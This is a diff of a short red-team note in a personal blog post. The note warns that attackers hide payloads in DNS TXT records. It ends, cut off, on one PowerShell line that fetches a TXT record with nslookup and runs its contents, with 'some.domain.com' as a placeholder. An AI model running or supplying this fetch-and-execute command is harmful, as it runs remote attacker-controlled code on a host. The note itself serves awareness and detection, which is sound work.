ashizZz/ashizZz.github.io/_posts/2022-09-20-Red-team-notes.md

 # Windows

+## Malicious Payload in DNS Txt
-## Attacker can put malicious payload in DNS TXT record content of domain.
+Attacker can put malicious payload in DNS TXT record content of domain.
 So, watch out for:

 ```bash
 powershell . (nslookup -q=txt some.domain.com)[-1]